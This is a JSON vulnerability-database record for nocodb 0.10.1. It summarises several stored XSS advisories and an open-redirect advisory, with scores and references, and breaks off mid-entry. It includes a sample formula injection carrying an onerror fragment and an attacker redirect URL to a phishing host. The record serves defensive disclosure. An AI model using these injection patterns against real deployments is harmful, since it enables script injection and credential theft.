{"url":"http://public2.vulnerablecode.io/api/packages/559749?format=json","purl":"pkg:npm/nocodb@0.10.1","type":"npm","namespace":"","name":"nocodb","version":"0.10.1","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":null,"latest_non_vulnerable_version":null,"affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/21276?format=json","vulnerability_id":"VCID-3tyz-qt9n-87da","summary":"NocoDB Vulnerable to Stored Cross-Site Scripting via Comments and Rich Text Cells\n### Summary\nUser-controlled content in comments and rich text cells was rendered via `v-html` without sanitization, enabling stored XSS.\n\n### Details\nComments in `Comments.vue` and rich text in `TextArea.vue` were parsed by markdown-it with `html: true` and injected via `v-html`. The codebase had `vue-dompurify-html` available but these paths used raw `v-html`. Server-side, `Comment.insert()` used `extractProps()` instead of `extractPropsAndSanitize()`.\n\nCommenter role is sufficient for the comments vector; Editor role for rich text.\n\nThis issue was independently reported; see also GHSA-rcph-x7mj-54mm and GHSA-wwp2-x4rj-j8rm for the same root cause found by GitHub Security Lab.\n\n### Impact\nStored XSS — malicious scripts execute for any user viewing the comment or cell.\n\n### Credit\nThis issue was reported by [@bugbunny-research](https://github.com/bugbunny-research) 
(bugbunny.ai).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28398","reference_id":"","reference_type":"","scores":[{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12693","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28398"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-03T15:55:22Z/"}],"url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-8vm4-g489-v3w7","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-03T15:55:22Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-8vm4-g489-v3w7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28398","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L
/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28398"},{"reference_url":"https://github.com/advisories/GHSA-8vm4-g489-v3w7","reference_id":"GHSA-8vm4-g489-v3w7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8vm4-g489-v3w7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56424?format=json","purl":"pkg:npm/nocodb@0.301.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1x77-rftk-5qcx"},{"vulnerability":"VCID-3mx5-ertq-4bhx"},{"vulnerability":"VCID-4jbf-d3ec-zyh6"},{"vulnerability":"VCID-572y-xph2-e3hf"},{"vulnerability":"VCID-g7n3-mky5-5qbq"},{"vulnerability":"VCID-gb21-yah3-c3cb"},{"vulnerability":"VCID-n5e9-v49g-9qfb"},{"vulnerability":"VCID-weqq-ruh3-zudz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.3"}],"aliases":["CVE-2026-28398","GHSA-8vm4-g489-v3w7"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3tyz-qt9n-87da"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/22743?format=json","vulnerability_id":"VCID-4amk-tc13-m7c5","summary":"NocoDB has Stored Cross-site Scripting via Formula Cell\n### Summary\nA stored XSS vulnerability exists in the Formula virtual cell. Formula results containing `URI::()` patterns are rendered via `v-html` without sanitization, allowing injected HTML to execute.\n\n### Details\nThe `replaceUrlsWithLink()` function in `urlUtils.ts` converts `URI::(url)` patterns to `<a>` tags but passes all other HTML through unchanged. 
A user with Creator role (minimum role for formula field creation) can craft a formula like `CONCAT(\"URI::(https://example.com)\", \"<img src=x onerror=...>\")` to inject arbitrary scripts rendered for all viewers.\n\n### Impact\nCredential theft via script execution in the context of users viewing the table.\n\n### Credit\nThis issue was reported by [@Akokonunes](https://github.com/Akokonunes).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28357","reference_id":"","reference_type":"","scores":[{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12693","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28357"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-02T16:50:04Z/"}],"url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-vx5p-q85x-xm3c","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Tr
ack","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-02T16:50:04Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-vx5p-q85x-xm3c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28357","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28357"},{"reference_url":"https://github.com/advisories/GHSA-vx5p-q85x-xm3c","reference_id":"GHSA-vx5p-q85x-xm3c","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vx5p-q85x-xm3c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56424?format=json","purl":"pkg:npm/nocodb@0.301.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1x77-rftk-5qcx"},{"vulnerability":"VCID-3mx5-ertq-4bhx"},{"vulnerability":"VCID-4jbf-d3ec-zyh6"},{"vulnerability":"VCID-572y-xph2-e3hf"},{"vulnerability":"VCID-g7n3-mky5-5qbq"},{"vulnerability":"VCID-gb21-yah3-c3cb"},{"vulnerability":"VCID-n5e9-v49g-9qfb"},{"vulnerability":"VCID-weqq-ruh3-zudz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.3"}],"aliases":["CVE-2026-28357","GHSA-vx5p-q85x-xm3c"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4amk-tc13-m7c5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/53228?format=json","vulnerability_id":"VCID-ctkq-rnus-b7au","summary":"Cross-site Scripting in NocoDB\nCross-site Scripting (XSS) - Stored in GitHub repository nocodb/nocodb prior to 
0.91.9.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-2079","reference_id":"","reference_type":"","scores":[{"value":"0.00509","scoring_system":"epss","scoring_elements":"0.66643","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-2079"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/commit/362f8f0869989bc13bdcd66c6fc9c86ac79b9992","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/commit/362f8f0869989bc13bdcd66c6fc9c86ac79b9992"},{"reference_url":"https://github.com/nocodb/nocodb/issues/2262","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/issues/2262"},{"reference_url":"https://github.com/nocodb/nocodb/pull/2343","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/pull/2343"},{"reference_url":"https://github.com/nocodb/nocodb/releases","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},
{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb/releases"},{"reference_url":"https://huntr.dev/bounties/2615adf2-ff40-4623-97fb-2e4a3800202a","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/2615adf2-ff40-4623-97fb-2e4a3800202a"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-2079","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-2079"},{"reference_url":"https://github.com/advisories/GHSA-hv6q-5g4f-8897","reference_id":"GHSA-hv6q-5g4f-8897","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hv6q-5g4f-8897"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/94585?format=json","purl":"pkg:npm/nocodb@0.91.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-cyff-z51h-3ka5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-ht9j-4wpu-1fdc"},{"vulnerability":"VCID-kf54-9jbn-j3e7"},{"vulnerability":"VCID-mn3h-sy2t-6fem"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-p9mr-w1yp-mffa"},{"vulnerability":"VCID-pes6-6f16-s7de"},{"vulnerability":"VCID-tpc8-v7f5-73dg"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-x6m1-a44z-
u3bd"},{"vulnerability":"VCID-ycfk-e7rx-nqhc"},{"vulnerability":"VCID-ykcq-ue1s-xbd5"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.91.9"}],"aliases":["CVE-2022-2079","GHSA-hv6q-5g4f-8897"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ctkq-rnus-b7au"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/18917?format=json","vulnerability_id":"VCID-cyff-z51h-3ka5","summary":"NocoDB has Unvalidated Redirect in Login Flow via continueAfterSignIn Parameter\n### Summary\n\nAn **unvalidated redirect (open redirect)** vulnerability exists in NocoDB’s login flow due to missing validation of the `continueAfterSignIn` parameter.\n\nDuring authentication, NocoDB processes a user-controlled redirect value and conditionally performs client-side navigation without enforcing any restrictions on the destination’s origin, domain or protocol. This allows attackers to redirect authenticated users to arbitrary external websites after login.\n\n### Root Cause\n\nThe redirect logic relies on a permissive URL check that treats any absolute or protocol-relative URL as safe, and performs navigation without applying an allowlist or origin validation.\n\nIn the redirect plugin:\n\n* The helper function `isFullUrl` uses the following regular expression:\n\n  ```ts\n  /^(https?:)?\\/\\//\n  ```\n\n  This pattern matches any HTTP(S) URL as well as protocol-relative URLs (e.g., `//evil.example`), without restricting allowed domains.\n\n* When the `continueAfterSignIn` query parameter matches this pattern, the application performs an unconditional external navigation:\n\n  ```ts\n  navigateTo(route.value.query.continueAfterSignIn as string, {\n    external: isFullUrl(...)\n  })\n  ```\n\n### Attack Scenario\n\nAn attacker can exploit this issue through a phishing attack:\n\n1. 
The attacker crafts a malicious login URL containing a controlled redirect target, for example:\n\n   ```\n   https://victim-nocodb.example/#/signin?continueAfterSignIn=https://evil-phishing.com/fake-login\n   ```\n2. The victim clicks the link and is presented with the legitimate NocoDB login page.\n3. The victim authenticates using valid credentials.\n4. After login, NocoDB automatically redirects the victim to the attacker-controlled external site.\n5. The attacker’s site displays a fake error message and prompts the victim to re-enter credentials.\n6. The victim unknowingly submits credentials to the attacker.\n\n### Impact\n\nThis vulnerability enables **phishing attacks** by leveraging user trust in the legitimate NocoDB login flow. While it does not directly expose credentials or bypass authentication, it increases the likelihood of credential theft through social engineering.\n\nThe issue does not allow arbitrary code execution or privilege escalation, but it undermines authentication integrity.\n\n### Credit\n\nThis issue was discovered by an AI agent developed by the GitHub Security Lab and reviewed by GHSL team members [@p- (Peter Stöckli)](https://github.com/p-) and [@m-y-mo (Man Yue 
Mo)](https://github.com/m-y-mo).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24768","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05304","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24768"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-3hmw-8mw3-rmpj","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-29T16:03:11Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-3hmw-8mw3-rmpj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24768","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24768"},{"reference_url":"https://github.com/advisories/GHSA-3hmw-8mw3-rmpj","reference_id":"GHSA-3hmw-8mw3-rmpj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3hmw-8mw3-rmpj"}],"fixed_packages":[{"url":
"http://public2.vulnerablecode.io/api/packages/53048?format=json","purl":"pkg:npm/nocodb@0.301.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3tyz-qt9n-87da"},{"vulnerability":"VCID-4amk-tc13-m7c5"},{"vulnerability":"VCID-ev8h-9es8-rkhj"},{"vulnerability":"VCID-f8dr-ugxz-abb1"},{"vulnerability":"VCID-fvtg-v6h6-r7cf"},{"vulnerability":"VCID-g231-kqp3-63b5"},{"vulnerability":"VCID-n449-xc5n-yuf8"},{"vulnerability":"VCID-nbre-gc8b-73af"},{"vulnerability":"VCID-vs5e-zmcs-8kam"},{"vulnerability":"VCID-z9nq-zv94-syhg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.0"}],"aliases":["CVE-2026-24768","GHSA-3hmw-8mw3-rmpj"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cyff-z51h-3ka5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/23617?format=json","vulnerability_id":"VCID-ev8h-9es8-rkhj","summary":"NocoDB Vulnerable to Stored Cross-site Scripting via Rich Text Field\n### Summary\nAn authenticated user with Editor role can inject arbitrary HTML into Rich Text cells by bypassing the TipTap editor and sending raw HTML via the API.\n\n### Details\nThe TipTap editor sanitizes HTML client-side, but the backend stores raw HTML without server-side sanitization. 
The stored content is rendered via `v-html` in `TextArea.vue` through `NcMarkdownParser.parse()` which performs no sanitization.\n\n### Impact\nStored XSS — malicious scripts execute for any user viewing the cell.\n\n### Credit\nThis issue was reported by [@Akokonunes](https://github.com/Akokonunes).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28359","reference_id":"","reference_type":"","scores":[{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12693","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28359"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-03T16:06:57Z/"}],"url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-qxwq-q265-hc44","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-03T16:
06:57Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-qxwq-q265-hc44"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28359","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28359"},{"reference_url":"https://github.com/advisories/GHSA-qxwq-q265-hc44","reference_id":"GHSA-qxwq-q265-hc44","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qxwq-q265-hc44"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56424?format=json","purl":"pkg:npm/nocodb@0.301.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1x77-rftk-5qcx"},{"vulnerability":"VCID-3mx5-ertq-4bhx"},{"vulnerability":"VCID-4jbf-d3ec-zyh6"},{"vulnerability":"VCID-572y-xph2-e3hf"},{"vulnerability":"VCID-g7n3-mky5-5qbq"},{"vulnerability":"VCID-gb21-yah3-c3cb"},{"vulnerability":"VCID-n5e9-v49g-9qfb"},{"vulnerability":"VCID-weqq-ruh3-zudz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.3"}],"aliases":["CVE-2026-28359","GHSA-qxwq-q265-hc44"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ev8h-9es8-rkhj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/22309?format=json","vulnerability_id":"VCID-f8dr-ugxz-abb1","summary":"NocoDB Vulnerable to Stored Cross-site Scripting via Comments\n### Summary\nComments rendered via `v-html` without sanitization, enabling stored XSS.\n\n### Details\nComments in `Comments.vue` were parsed by markdown-it with `html: true` and injected via `v-html` without DOMPurify. 
A user with Commenter role can inject arbitrary HTML that executes for all viewers.\n\n### Impact\nStored XSS — malicious scripts execute for any user viewing the comment.\n\n### Credit\nThis issue was discovered by an AI agent developed by the GitHub Security Lab and reviewed by GHSL team members [@p-](https://github.com/p-) (Peter Stockli) and [@m-y-mo](https://github.com/m-y-mo) (Man Yue Mo).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28397","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02553","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28397"},{"reference_url":"https://github.com/nocodb/nocodb","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nocodb/nocodb"},{"reference_url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-03T15:55:50Z/"}],"url":"https://github.com/nocodb/nocodb/releases/tag/0.301.3"},{"reference_url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-rcph-x7mj-54mm","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Tra
ck","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-03T15:55:50Z/"}],"url":"https://github.com/nocodb/nocodb/security/advisories/GHSA-rcph-x7mj-54mm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28397","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28397"},{"reference_url":"https://github.com/advisories/GHSA-rcph-x7mj-54mm","reference_id":"GHSA-rcph-x7mj-54mm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rcph-x7mj-54mm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56424?format=json","purl":"pkg:npm/nocodb@0.301.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1x77-rftk-5qcx"},{"vulnerability":"VCID-3mx5-ertq-4bhx"},{"vulnerability":"VCID-4jbf-d3ec-zyh6"},{"vulnerability":"VCID-572y-xph2-e3hf"},{"vulnerability":"VCID-g7n3-mky5-5qbq"},{"vulnerability":"VCID-gb21-yah3-c3cb"},{"vulnerability":"VCID-n5e9-v49g-9qfb"},{"vulnerability":"VCID-weqq-ruh3-zudz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/nocodb@0.301.3"}],"aliases":["CVE-2026-28397","GHSA-rcph-x7mj-54mm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-f8dr-ugxz-abb1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/23188?format=json","vulnerability_id":"VCID-fvtg-v6h6-r7cf","summary":"NocoDB Vulnerable to Stored Cross-Site Scripting via Rich Text Cells\n### Summary\nRich text cell content rendered via `v-html` without sanitization, enabling stored XSS.\n\n### Details\nRich text in `TextArea.vue` was parsed by markdown-it with 
`html: true` and injected via `v-html` without DOMPurify. A user with Editor role can inject arbitrary HTML that executes for all viewers.\n\n### Impact\nStored XSS — malicious scripts execute for any user viewing the cell.\n\n### Credit\nThis issue was discovered by an AI agent developed by the GitHub Security Lab and reviewed by GHSL team members [@p-](https://github.com/p-) (Peter Stockli) and [@m-y-mo](https://github.com/m-y-mo) (Man Yue 